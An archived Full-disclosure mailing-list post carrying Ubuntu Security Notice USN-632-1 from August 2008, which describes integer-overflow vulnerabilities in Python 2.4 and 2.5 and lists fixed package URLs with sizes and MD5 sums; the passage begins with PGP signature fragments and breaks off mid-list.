RKMWpO+M9bHp4d+puY0L1YwN1OMatcMMpcWnZpiWiR83oi32+xtWUY2U7Ae38mMa g8zFbpeqPQUsDv9V7CAJ1dbriEwEGBECAAwFAkDYBnoFCQ5t3+gACgkQqE7a6JyA CspnpgCfRbYwxT3iq+9l/PgNTUNTZOlof2oAn25y0eGi0371jap9kOV6uq71sUuO =ypVs - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBSJL0gHey5gA9JdPZAQI4IAf7BPqInfbAyzZObcX2vGZM0svDKclNQMAO 1tTE0O3Te0EYLOnkfEisqNe9AOioSUQqeWu7ud5Y8L5zVysmcGe3/Lg0Vqmie/he WJXCJtkvaPOcp7p/GcnWQByQ4T1cQ4+QoLhwg2+RpyAABn/7ZWBz+uG91134kOql JabvxLI05Le++uwFfJ0YEefkSzik9sMVz4Dk4eVJglMm6nioHnx6K6ZrR0+0HBRR z2Rczq0M3gYplfWpgydgtlFH4dhkXlhfuladf93Aagf6QWerwvxTEld7ti+Sx3dU uInx4nkLJHLeu1f/XD4i7ZpZ0DtBz0F9wWJFGmy2cXxW0Xnhtwdbnw== =QwLq -----END PGP SIGNATURE----- From kees at ubuntu.com Fri Aug 1 15:51:27 2008 From: kees at ubuntu.com (Kees Cook) Date: Fri, 1 Aug 2008 07:51:27 -0700 Subject: [Full-disclosure] [USN-632-1] Python vulnerabilities Message-ID: <20080801145127.GC21348@outflux.net> =========================================================== Ubuntu Security Notice USN-632-1 August 01, 2008 python2.4, python2.5 vulnerabilities CVE-2008-1679, CVE-2008-1721, CVE-2008-1887, CVE-2008-2315, CVE-2008-2316, CVE-2008-3142, CVE-2008-3143, CVE-2008-3144 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: python2.4 2.4.3-0ubuntu6.2 python2.4-minimal 2.4.3-0ubuntu6.2 Ubuntu 7.04: python2.4 2.4.4-2ubuntu7.2 python2.4-minimal 2.4.4-2ubuntu7.2 python2.5 2.5.1-0ubuntu1.2 python2.5-minimal 2.5.1-0ubuntu1.2 Ubuntu 7.10: python2.4 2.4.4-6ubuntu4.2 python2.4-minimal 2.4.4-6ubuntu4.2 python2.5 2.5.1-5ubuntu5.2 python2.5-minimal 2.5.1-5ubuntu5.2 Ubuntu 8.04 LTS: python2.4 2.4.5-1ubuntu4.1 python2.4-minimal 2.4.5-1ubuntu4.1 python2.5 2.5.2-2ubuntu4.1 python2.5-minimal 2.5.2-2ubuntu4.1 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: It was discovered that there were new integer overflows in the imageop module. If an attacker were able to trick a Python application into processing a specially crafted image, they could execute arbitrary code with user privileges. (CVE-2008-1679) Justin Ferguson discovered that the zlib module did not correctly handle certain archives. If an attacker were able to trick a Python application into processing a specially crafted archive file, they could execute arbitrary code with user privileges. (CVE-2008-1721) Justin Ferguson discovered that certain string manipulations in Python could be made to overflow. If an attacker were able to pass a specially crafted string through the PyString_FromStringAndSize function, they could execute arbitrary code with user privileges. (CVE-2008-1887) Multiple integer overflows were discovered in Python's core and modules including hashlib, binascii, pickle, md5, stringobject, unicodeobject, bufferobject, longobject, tupleobject, stropmodule, gcmodule, and mmapmodule. If an attacker were able to exploit these flaws they could execute arbitrary code with user privileges or cause Python applications to crash, leading to a denial of service. (CVE-2008-2315, CVE-2008-2316, CVE-2008-3142, CVE-2008-3143, CVE-2008-3144). Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2.diff.gz Size/MD5: 2659655 79cfb16c20f87377a79ae1068eefd7fe http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2.dsc Size/MD5: 1261 59b4e269522696105572fb2d23ecae75 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3.orig.tar.gz Size/MD5: 9328584 fd9dd825b8c680fa04c2fc2c957964b1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/idle-python2.4_2.4.3-0ubuntu6.2_all.deb Size/MD5: 243158 237a537ba8a40032311ce70b9b142908 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-doc_2.4.3-0ubuntu6.2_all.deb Size/MD5: 3357934 424d51830d26cc3a80d8df9dae578b9a http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-examples_2.4.3-0ubuntu6.2_all.deb Size/MD5: 587390 a878b5a8ab9a6544106a8c779ef341a6 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 5568776 c5a350c0953b4eb23633e58c2a267799 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 1635048 ec18f029d34290df08cb2a1aaba8a9c5 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-gdbm_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 30072 b2c8e4c4437baa9c2cbd5949d86abe4f http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 793962 6c81a3e2e045cdf4c2684a05121218c9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-tk_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 113812 c463a7a7be42bd01f918ad9ff01bd6ae http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2_amd64.deb Size/MD5: 2861788 41d6a96da599a5d09d436dee2292e793 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 4828590 6b803d0ad098dbd0ea770bc3a321712f http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 1466074 064333d1ce7d52c271dca3ffca1b73d9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-gdbm_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 29310 be8ba92ee319623ad8e1dae2e46e850b http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 703370 1d6f7f0a6649be443337d245bf1cf947 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-tk_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 110160 020aabfe30e265b0c48995a9e3cd12c8 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2_i386.deb Size/MD5: 2739420 999ce42fcfacb4322fdb45e7976cdaa3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 5671080 30a519a3be8c332d483011002c283841 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 1630992 6d69e39045790639a5d5bdbce36ed30f http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-gdbm_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 31278 f7be4c74b7ae71ffa0032df26825e49c http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 783202 a96948d6153e9ccdb86b9880aa77d241 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-tk_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 113074 393ca0b1b2ee68533538d691fbc5c742 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2_powerpc.deb Size/MD5: 2887496 69d604dfbfcaf8db1b881a136f30e828 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 5004064 a07fd7a1b6425f06bc382c653b9096a7 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 1578922 3b77f095775183c6fa81c916c6113348 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-gdbm_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 29490 6bd9c5fa849ae8d641193eb3c5837d82 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 723648 f57275440a13ee0bc69e403482575ce9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-tk_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 110918 40dcac5ff4b112845c40994629de636b http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.3-0ubuntu6.2_sparc.deb Size/MD5: 2803228 d40fcf17483d3cf3f7ab0db9445730c8 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2.diff.gz Size/MD5: 2701347 b84fda955aa57371cc3fb36298f9c01e http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2.dsc Size/MD5: 1330 147dfc5fef334b337e41e9b8e671f0f8 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4.orig.tar.gz Size/MD5: 9508940 f74ef9de91918f8927e75e8c3024263a http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2.diff.gz Size/MD5: 2995766 b91a12102be5bfc9fd9c432f1b5e47e9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2.dsc Size/MD5: 1452 81a359ebdca2b6e2ebc03ffde59c76a9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1.orig.tar.gz Size/MD5: 11073614 b7e26a0039645f1145ceb6f4dea4a758 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-doc_2.4.4-2ubuntu7.2_all.deb Size/MD5: 3467124 9b0d217aa828f74f9bfe2c494dff3242 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-examples_2.4.4-2ubuntu7.2_all.deb Size/MD5: 590720 b6c4a64c013757ebb242fd5795073dcc http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-doc_2.5.1-0ubuntu1.2_all.deb Size/MD5: 2504620 f17f63d4222e0c9443fc0ec6e5c0dc43 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-examples_2.5.1-0ubuntu1.2_all.deb Size/MD5: 647548 272e8cb7a7d3446eeea7db9d5e0ed86e http://security.ubuntu.com/ubuntu/pool/universe/p/python2.4/idle-python2.4_2.4.4-2ubuntu7.2_all.deb Size/MD5: 61950 ebede71649b619574e27af37f4f30ec2 http://security.ubuntu.com/ubuntu/pool/universe/p/python2.5/idle-python2.5_2.5.1-0ubuntu1.2_all.deb Size/MD5: 66330 821bee47fa6b2271353a3bfbab572c26 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-2ubuntu7.2_amd64.deb Size/MD5: 6980942 59ce0a2ad07d439fd2316b2397701370 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-2ubuntu7.2_amd64.deb Size/MD5: 1618280 92a5f4824b36bdefdf1fac46c2408d77 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-2ubuntu7.2_amd64.deb Size/MD5: 1047530 9dca597560b8fb8f71e5dc9fd0dd5262 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2_amd64.deb Size/MD5: 2899052 1f0cdceec1bb1142b92bcd26fbf074c5 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-0ubuntu1.2_amd64.deb Size/MD5: 8055664 8b28335ab58c9c686351cbc850b1421f http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-0ubuntu1.2_amd64.deb Size/MD5: 1793064 07bdf1e57eb63f780acfd4cab8cf2a2d http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-0ubuntu1.2_amd64.deb Size/MD5: 1248758 2af929adf69381f29ee94efbe32c01fb http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2_amd64.deb Size/MD5: 3208140 4976a32e3287d31f655dc7beb970d254 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-2ubuntu7.2_i386.deb Size/MD5: 6410254 f0e3e0404a8be84bd6152c6a9a2e3aa3 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-2ubuntu7.2_i386.deb Size/MD5: 1477124 a1ba850d8c2150896e57f7baada05442 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-2ubuntu7.2_i386.deb Size/MD5: 972230 1409d1329ceea6374910c139a656a3cb http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2_i386.deb Size/MD5: 2799520 814cefbadf2ccf3a4d0233a4a7d436d2 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-0ubuntu1.2_i386.deb Size/MD5: 7429402 30aba61653609ec966490844113dec72 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-0ubuntu1.2_i386.deb Size/MD5: 1645714 2cfa05249742fef96e9f3e9921b4c83b http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-0ubuntu1.2_i386.deb Size/MD5: 1168856 d69a774f2300d0e3bebfa5026a0590b1 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2_i386.deb Size/MD5: 3090648 512360defc19f2ca31abebf208cfc604 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-2ubuntu7.2_powerpc.deb Size/MD5: 7309592 ec89ecd19f6eb0b34312ff3827fb89e0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-2ubuntu7.2_powerpc.deb Size/MD5: 1637656 23b507740d06aa06ec9a0a1c71cbccec http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-2ubuntu7.2_powerpc.deb Size/MD5: 1072396 958e96a0a05675f7287d72c98d8f2883 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2_powerpc.deb Size/MD5: 2958110 9110078db67be9ff5c3aff37565f5e6a http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-0ubuntu1.2_powerpc.deb Size/MD5: 8419522 c19cfb1c5d00e3d1a340ae0945509502 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-0ubuntu1.2_powerpc.deb Size/MD5: 1811154 561a18fe8a51437a46d099964cde2216 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-0ubuntu1.2_powerpc.deb Size/MD5: 1277790 aa569520cd1a4d7c2d8524099045744f http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2_powerpc.deb Size/MD5: 3284928 bd6da448cc2dd9a97191560afb4e1eb7 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-2ubuntu7.2_sparc.deb Size/MD5: 6591548 7a984306066b0648f2fc35e892ee9485 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-2ubuntu7.2_sparc.deb Size/MD5: 1570200 47f0a83ed70f97a7f541638363362931 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-2ubuntu7.2_sparc.deb Size/MD5: 998314 3d8bf6db785d502f57417aac842be74e http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-2ubuntu7.2_sparc.deb Size/MD5: 2829580 d50b08645a4b5346f683fe4ad9f1e7c4 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-0ubuntu1.2_sparc.deb Size/MD5: 7628064 8fd81cf0ff7ad80828c06a8e53143fb2 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-0ubuntu1.2_sparc.deb Size/MD5: 1747038 fcbf92c2ded2e2c339df7e17eaad2c98 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-0ubuntu1.2_sparc.deb Size/MD5: 1196320 41daa3cb6b2c970b849cc92248b778d0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-0ubuntu1.2_sparc.deb Size/MD5: 3128594 d1c0a71bd660017181a115156d7ca540 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2.diff.gz Size/MD5: 2665505 d3b48d2d2363eae6e9311f32143fb166 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2.dsc Size/MD5: 1387 33390484e8187f5896007e11dc73d13b http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4.orig.tar.gz Size/MD5: 9508940 f74ef9de91918f8927e75e8c3024263a http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2.diff.gz Size/MD5: 3085721 c8d25c1eada232d40178aeb95e898476 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2.dsc Size/MD5: 1441 378bd6b5c0bb11e0dc46fdb824075e62 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1.orig.tar.gz Size/MD5: 11073614 b7e26a0039645f1145ceb6f4dea4a758 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-doc_2.4.4-6ubuntu4.2_all.deb Size/MD5: 3366838 86b53516b0d2651c0309445eb74cd220 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-examples_2.4.4-6ubuntu4.2_all.deb Size/MD5: 591332 00c1ad4ccb000a7a6231a07ddfbb8b10 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-doc_2.5.1-5ubuntu5.2_all.deb Size/MD5: 3724666 70e98768659d070e60a7f30c014572b7 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-examples_2.5.1-5ubuntu5.2_all.deb Size/MD5: 648892 d2bc23ec61ef990182527f0a4d25fab3 http://security.ubuntu.com/ubuntu/pool/universe/p/python2.4/idle-python2.4_2.4.4-6ubuntu4.2_all.deb Size/MD5: 62482 70d9d2268b9cfa97ea636fac97360800 http://security.ubuntu.com/ubuntu/pool/universe/p/python2.5/idle-python2.5_2.5.1-5ubuntu5.2_all.deb Size/MD5: 67300 36684dc3985d17d9fc20df38d4159bf6 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-6ubuntu4.2_amd64.deb Size/MD5: 6932036 d1843d75bcda73cbef1aae2acf110541 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-6ubuntu4.2_amd64.deb Size/MD5: 1623636 a4722bfc9d32de2ff2e2a42b58ce2e9a http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-6ubuntu4.2_amd64.deb Size/MD5: 1049154 33c7f2d43953817e6a51127d3e5cd3c1 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2_amd64.deb Size/MD5: 2902650 7ae0e26a366bcbef4721be1b986ea455 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-5ubuntu5.2_amd64.deb Size/MD5: 8008182 e5a849ec651c68e3ed05fa40deeba12f http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-5ubuntu5.2_amd64.deb Size/MD5: 2036908 7ea63a59e73a40e3739c595212b0b8c1 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-5ubuntu5.2_amd64.deb Size/MD5: 1252758 22238a8e564f0002dca9d3d7330254e0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2_amd64.deb Size/MD5: 2992366 e071e0116893c7276bcda4ab7e76145e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-6ubuntu4.2_i386.deb Size/MD5: 6415256 3c8ddaaf54ca494c2110f7dd9a918660 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-6ubuntu4.2_i386.deb Size/MD5: 1479690 2c38233f9eada9e8f5ffe38e11500378 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-6ubuntu4.2_i386.deb Size/MD5: 973528 235558dce9adbd9e42902b179db493ce http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2_i386.deb Size/MD5: 2801720 83fb8fb3e4e6cb4cba7f358d7dd0e296 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-5ubuntu5.2_i386.deb Size/MD5: 7441082 a160a5e8c312e41b43a3625f94c48e52 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-5ubuntu5.2_i386.deb Size/MD5: 1880674 0d48d7b75ffceaa7c3d7f74036cffd2e http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-5ubuntu5.2_i386.deb Size/MD5: 1171198 8987698f641a027f5313d02fc0401493 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2_i386.deb Size/MD5: 2871008 b962811c9138713398ba656acc068a3f lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dbg_2.4.4-6ubuntu4.2_lpia.deb Size/MD5: 6557610 ec5a40c3c76ee7b039d3eb76104746cb http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dev_2.4.4-6ubuntu4.2_lpia.deb Size/MD5: 1482274 bcb624ab7ac3443242bf17f56f60f570 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-minimal_2.4.4-6ubuntu4.2_lpia.deb Size/MD5: 978296 fcf10a77a2ea47045c51024dcef9c8bd http://ports.ubuntu.com/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2_lpia.deb Size/MD5: 2809990 0ac942a92e9fce3aa23ff25817f20a2b http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dbg_2.5.1-5ubuntu5.2_lpia.deb Size/MD5: 7558660 9441ba23b2a4fa4789f40c82bfb5a951 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dev_2.5.1-5ubuntu5.2_lpia.deb Size/MD5: 1878546 899a53b2dcec9f51611021c4f0e3f2c7 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-minimal_2.5.1-5ubuntu5.2_lpia.deb Size/MD5: 1176698 57245ff934f1295dfe1664c3aa79e463 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2_lpia.deb Size/MD5: 2877828 9acbe0c10365c3fa0de46ba952ade420 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-6ubuntu4.2_powerpc.deb Size/MD5: 7224792 82ba59b25b54a95fd4a86c9af9316213 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-6ubuntu4.2_powerpc.deb Size/MD5: 1639076 230b59e095d8ef033ccf47320f114e7e http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-6ubuntu4.2_powerpc.deb Size/MD5: 1073736 5f32a92d1fe529d68603d0e73523a761 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2_powerpc.deb Size/MD5: 2959224 323021b2d48914a0611d85616a6a0182 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-5ubuntu5.2_powerpc.deb Size/MD5: 8339992 6d4c57d5531d7bb0077fa4b64fc9b298 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-5ubuntu5.2_powerpc.deb Size/MD5: 2050894 df0f1ae42f24a23ae71306f6154cecd0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-5ubuntu5.2_powerpc.deb Size/MD5: 1279780 c5d9df3f094fc761cbd232e0f0f570b0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2_powerpc.deb Size/MD5: 3066380 2027ebc2b326901e3daac24693bb36ac sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.4-6ubuntu4.2_sparc.deb Size/MD5: 6528160 dda7795f7cf234aa3ef81fbf4bfc993e http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.4-6ubuntu4.2_sparc.deb Size/MD5: 1570180 997078e6cb4879383c52000797d23bb8 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.4-6ubuntu4.2_sparc.deb Size/MD5: 998962 c75c4d8889dd8169e06f0f7fa0b54f1a http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.4-6ubuntu4.2_sparc.deb Size/MD5: 2831116 6ec859f6d67a173c63b74a8cf68c0156 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.1-5ubuntu5.2_sparc.deb Size/MD5: 7563582 c0ce6a10b8b5427835b47bebc8564bf8 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.1-5ubuntu5.2_sparc.deb Size/MD5: 1985884 57377d3d739c50e80c6e73c70a6d7f7f http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.1-5ubuntu5.2_sparc.deb Size/MD5: 1199170 688de7bf6c1eb05737feddf5299f17be http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.1-5ubuntu5.2_sparc.deb Size/MD5: 2909220 36bd139e9b931289d7f457e6e77062d1 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1.diff.gz Size/MD5: 2664328 b791317a007fef4552c2bf8ba55a13ec http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1.dsc Size/MD5: 1457 3271c840e59a8f68b52cde12a0fddd25 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.5.orig.tar.gz Size/MD5: 9523188 9a615c6868074f60872084ecd240de3e http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1.diff.gz Size/MD5: 2954400 432a052851cecca3bf0f3bb2e7619322 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1.dsc Size/MD5: 1628 515cdb24298d56b8b46d7608293853bc http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.2.orig.tar.gz Size/MD5: 11577883 87619e5bf07b3506fec639b7e4d86215 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-doc_2.4.5-1ubuntu4.1_all.deb Size/MD5: 3369502 77b604e32ec8be3d38004ced3d2913dc http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-examples_2.4.5-1ubuntu4.1_all.deb Size/MD5: 591744 c8bc2182eeafeafce1cf053d86f7f725 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-doc_2.5.2-2ubuntu4.1_all.deb Size/MD5: 3729274 1e20f6ea290807e6734823b437267716 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-examples_2.5.2-2ubuntu4.1_all.deb Size/MD5: 650848 8c69cd9104f936747ab07055dbeaeb13 http://security.ubuntu.com/ubuntu/pool/universe/p/python2.4/idle-python2.4_2.4.5-1ubuntu4.1_all.deb Size/MD5: 63660 0a7cec3255e8a3fdf85d8fbb3d603b51 http://security.ubuntu.com/ubuntu/pool/universe/p/python2.5/idle-python2.5_2.5.2-2ubuntu4.1_all.deb Size/MD5: 69920 3471e8296a305341663c6a0e2d7e12d3 amd64 architecture 